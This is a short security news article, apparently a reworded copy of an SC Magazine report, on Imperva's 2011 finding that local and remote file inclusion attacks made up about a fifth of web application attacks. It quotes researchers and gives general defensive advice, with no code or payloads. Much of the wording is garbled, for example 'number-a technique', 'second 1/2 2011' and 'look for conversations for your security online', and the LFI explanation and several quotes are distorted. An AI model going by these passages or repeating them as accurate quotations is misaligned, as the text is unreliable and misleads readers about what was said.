Remote and native file inclusion application attacks \'slipping under the radar\'

Despite accounting for a fifth of attacks on applications, awareness of remote and native file inclusion is worryingly low.

According to Imperva, local file inclusion (LFI) and remote file inclusion (RFI) attacks accounted for 21 per cent of all application attacks between June and November 2011 on 40 applications. The method allows an attacker to execute malicious code on a server to steal data.

Talking to SC Magazine, Imperva senior security strategist Noa Bar-Yosef said that with an RFI attack, the attacker uploads the malware to the server so it truly is an underlying application security threat, and here's prevalent as one of many top four techniques.

“This targets PHP applications which affect 77 per cent of web sites, so the capability is large. The TimThumb vulnerability was an RFI attack, and so was the attack at the military dating site. This shows that file inclusion attacks are one of many top techniques we've seen,” she said.

She also said that RFI attacks are automated, with attackers using botnets to milk vulnerabilities.

“SQL injection is the number-a technique to attack applications to take away data, but we're seeing better techniques. An RFI attack could cause a crash, extract data and permit an attacker to take over a server. We saw a rise inside the second 1/2 2011, and what's concerning is this doesn't manifest within the OWASP top ten attacks,” Bar-Yosef said.

An LFI attack is conducted when a file is added locally by tricking the server into uploading a file, so as opposed to fetching the file, it's on there already (rather than an RFI, where you visit a remote server).

A simple approach to infection is via a jpeg file which may have .TXT code and will infect an RFI vulnerability.

Asked how this may be blocked or avoided, Bar-Yosef cited the most important areas of application security: to look for conversations for your security online; blacklist IP addresses you recognize to be bad; install an online application firewall; consider a vulnerability assessment tool where the information will feed into the firewall; and look to prevent automated attacks.

She said: “Also fix your code as, ultimately, to be secure try to be secure yourself.”

Tal Be'ery, Imperva's senior web researcher, said: “LFI and RFI are popular attack vectors for hackers because they're less known and very powerful when successful. We observed that hacktivists and for-profit hackers utilised these techniques extensively in 2011, and we believe it's time for the safety community to devote more attention to the problem.”